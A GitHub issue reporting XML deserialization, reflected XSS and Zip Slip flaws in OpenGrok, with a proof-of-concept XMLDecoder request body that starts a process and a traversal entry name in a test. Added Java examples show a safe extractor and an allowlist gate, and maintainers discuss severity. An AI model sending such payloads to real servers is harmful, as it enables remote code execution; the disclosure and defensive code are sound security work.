multiple vulnerabilities in input data handling #2749

Open
QiAnXinCodeSafe opened this issue Apr 12, 2019 · 4 comments

@QiAnXinCodeSafe

QiAnXinCodeSafe commented Apr 12, 2019

Hi!
I am a staff member of 360 Security Guard. We found multiple vulnerabilities in Opengrok in our open source code detection project. The details are as follows:
1. XML deserialization vulnerability
The set method in ConfigurationController.java receives the request body of the PUT request.
[image]
Finally, the parameter is passed to the decodeObject method and the XML is deserialized.
[image]
But an attacker can execute commands by passing the following request body.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_131" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start" />
    </object>
</java>
```

The same problem still exists at line 230 of FileHistoryCache.java.

2. Reflected XSS
Two parameters, r1 and r2, are received from the request at line 233 of PageConfig.java.
[image]
Finally, after a series of concatenations (but no filtering), they are output in diff.jsp.
For example:
[image]

3. Zip Slip
The zip file is decompressed in the extractArchive method of FileUtilities.java.
[image]
Since the zip entry name is not verified, when a zip file maliciously constructed by the attacker is decompressed (with an entry name containing "../" for path traversal), the file can be extracted to any directory, even overwriting system files.
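
The Zip Slip item above comes down to one missing check: the entry name is resolved against the destination directory without verifying that the result is still inside it. The following is an added example, not OpenGrok's extractArchive, showing that check in a hardened extractor and exercising it against a small archive built in memory (constructed test data) whose entry name climbs out of the target directory. The class name ZipSlipCheck, the helper names and the entry names are all assumed for illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

public class ZipSlipCheck {

    /** Raised when an entry name would resolve outside the destination directory. */
    public static class ZipSlipException extends IOException {
        ZipSlipException(String entryName) {
            super("zip entry escapes destination directory: " + entryName);
        }
    }

    /**
     * The missing check: resolve the entry name against destDir, collapse any
     * "../" segments with normalize(), and refuse the entry unless the result is
     * still inside destDir. Absolute entry names fail the same test, because
     * resolve() returns an absolute argument unchanged.
     */
    static Path resolveSafely(Path destDir, String entryName) throws ZipSlipException {
        Path root = destDir.toAbsolutePath().normalize();
        Path target = root.resolve(entryName).normalize();
        if (!target.startsWith(root)) {
            throw new ZipSlipException(entryName);
        }
        return target;
    }

    /**
     * Hardened extractor. The vulnerable shape is the same loop writing to
     * destDir.resolve(entry.getName()) with no check, which lets an entry named
     * "../../evil.sh" land two directories above destDir.
     */
    static List<Path> extractArchive(InputStream archive, Path destDir) throws IOException {
        List<Path> written = new ArrayList<>();
        try (ZipInputStream zin = new ZipInputStream(archive)) {
            ZipEntry entry;
            while ((entry = zin.getNextEntry()) != null) {
                Path target = resolveSafely(destDir, entry.getName()); // check before any write
                if (entry.isDirectory()) {
                    Files.createDirectories(target);
                } else {
                    Files.createDirectories(target.getParent());
                    Files.copy(zin, target, StandardCopyOption.REPLACE_EXISTING);
                    written.add(target);
                }
                zin.closeEntry();
            }
        }
        return written;
    }

    /** Builds a small archive in memory; the entry names are constructed test data. */
    static byte[] buildZip(String... entryNames) throws IOException {
        ByteArrayOutputStream bout = new ByteArrayOutputStream();
        try (ZipOutputStream zout = new ZipOutputStream(bout)) {
            for (String name : entryNames) {
                zout.putNextEntry(new ZipEntry(name)); // ZipOutputStream does not validate names
                zout.write(("content of " + name).getBytes(StandardCharsets.UTF_8));
                zout.closeEntry();
            }
        }
        return bout.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        Path dest = Files.createTempDirectory("extract-test");

        List<Path> ok = extractArchive(new ByteArrayInputStream(buildZip("src/Main.java", "README")), dest);
        System.out.println("extracted inside " + dest + ": " + ok);

        // Malicious archive: one entry whose name climbs out of dest. It must be
        // rejected before anything is written, not silently placed outside dest.
        try {
            extractArchive(new ByteArrayInputStream(buildZip("../../evil.sh")), dest);
            System.out.println("BUG: traversal entry was extracted");
        } catch (ZipSlipException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Save as ZipSlipCheck.java and run it; the benign archive is extracted under the temporary directory and the traversal entry is refused by resolveSafely before any file is created. Note that startsWith on a Path compares whole name elements, so a destination of /tmp/out does not accept /tmp/outside/x; a string prefix check would.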

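For the first item above, java.beans.XMLDecoder is not a data parser: every object, array and method element in the document is executed as a java.beans.Statement, which is why the posted body ends in ProcessBuilder.start(). As a defence-in-depth gate in front of the decoder, the added example below (not OpenGrok code) walks the document with a StAX reader and refuses it unless every class attribute is on an allowlist and every method attribute is one XMLEncoder itself emits; the class name XmlDecoderGate, the allowlist contents, and the two sample documents are assumed for illustration, and the benign one is constructed in the shape XMLEncoder produces for a configuration.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Set;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public class XmlDecoderGate {

    // Hypothetical allowlist: the types an XMLEncoder-produced configuration document
    // legitimately contains. Derive it from a real encoded config, never from a request.
    static final Set<String> ALLOWED_CLASSES = Set.of(
            "java.lang.String", "java.lang.Boolean", "java.lang.Integer", "java.lang.Long",
            "java.util.ArrayList", "java.util.HashMap", "java.util.TreeSet",
            "org.opengrok.indexer.configuration.Configuration");

    // XMLEncoder only emits these method names (collection add, map put, enum valueOf);
    // anything else ("start", "getClass", "forName", ...) is attacker-supplied.
    static final Set<String> ALLOWED_METHODS = Set.of("add", "put", "valueOf");

    /** Returns the policy violations found; an empty list means the document may be decoded. */
    static List<String> violations(String xml) throws XMLStreamException {
        XMLInputFactory factory = XMLInputFactory.newInstance();
        // The gate itself must not open an XXE hole: no DTDs, no external entities.
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);

        List<String> found = new ArrayList<>();
        XMLStreamReader reader = factory.createXMLStreamReader(
                new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        try {
            while (reader.hasNext()) {
                if (reader.next() != XMLStreamConstants.START_ELEMENT) {
                    continue;
                }
                String element = reader.getLocalName();
                if (element.equals("java")) {
                    continue; // root element; its class attribute names the decoder, nothing is instantiated
                }
                if (element.equals("class")) {
                    found.add("<class> element not allowed"); // would yield a Class object to reflect on
                    continue;
                }
                String cls = reader.getAttributeValue(null, "class");
                if (cls != null && !ALLOWED_CLASSES.contains(cls)) {
                    found.add("class not allowed: " + cls);
                }
                String method = reader.getAttributeValue(null, "method");
                if (method != null && !ALLOWED_METHODS.contains(method)) {
                    found.add("method not allowed: " + method);
                }
            }
        } finally {
            reader.close();
        }
        return found;
    }

    // The request body from the report, with the command swapped for a harmless one.
    static final String REPORTED_PAYLOAD =
            "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
          + "<java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\">\n"
          + "  <object class=\"java.lang.ProcessBuilder\">\n"
          + "    <array class=\"java.lang.String\" length=\"1\">\n"
          + "      <void index=\"0\"><string>true</string></void>\n"
          + "    </array>\n"
          + "    <void method=\"start\"/>\n"
          + "  </object>\n"
          + "</java>\n";

    // Constructed example of a configuration document in the shape XMLEncoder produces.
    static final String BENIGN_CONFIG =
            "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
          + "<java version=\"1.8.0_131\" class=\"java.beans.XMLDecoder\">\n"
          + "  <object class=\"org.opengrok.indexer.configuration.Configuration\">\n"
          + "    <void property=\"sourceRoot\"><string>/var/opengrok/src</string></void>\n"
          + "  </object>\n"
          + "</java>\n";

    public static void main(String[] args) throws XMLStreamException {
        System.out.println("reported payload: " + violations(REPORTED_PAYLOAD));
        System.out.println("benign config:    " + violations(BENIGN_CONFIG));
    }
}
```

Run as XmlDecoderGate.java: the reported payload is refused for both the ProcessBuilder class and the start method, the configuration document passes, and only a document with no violations should ever reach XMLDecoder. This narrows what an attacker can express but does not make XMLDecoder safe for arbitrary input; as the maintainer notes below, the exposure of the configuration endpoint itself is the larger question, and the durable fix is to stop handing request bodies to XMLDecoder at all.
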
@tulinkry
Contributor

> But an attacker can execute commands by passing the following request body.

Which body?

Thank you for your analysis.

@vladak
Member

vladak commented Apr 12, 2019

The XML was entered unescaped in the markdown, I fixed it.

@vladak
Member

vladak commented Apr 12, 2019

Basically, it passes ProcessBuilder with an argument. I guess such problems will be eradicated with #2329.

@vladak
Member

vladak commented Apr 12, 2019

Ideally, this should have been entered as 3 separate issues, we might deal with them as such.

In general, it would be beneficial to have a discussion on what attack vectors are important to us. For example, the XML decoding problem can only happen when it is possible to submit new configuration (this is normally constrained to localhost thanks to LocalhostFilter) which would be a problem on its own so the problem described is not really serious. That said, it pokes another hole in our serialization scheme.

@vladak vladak changed the title Opengrok Vulnerability multiple vulnerabilities in input data handling Apr 12, 2019
@vladak vladak added the bug label Apr 12, 2019

3 participants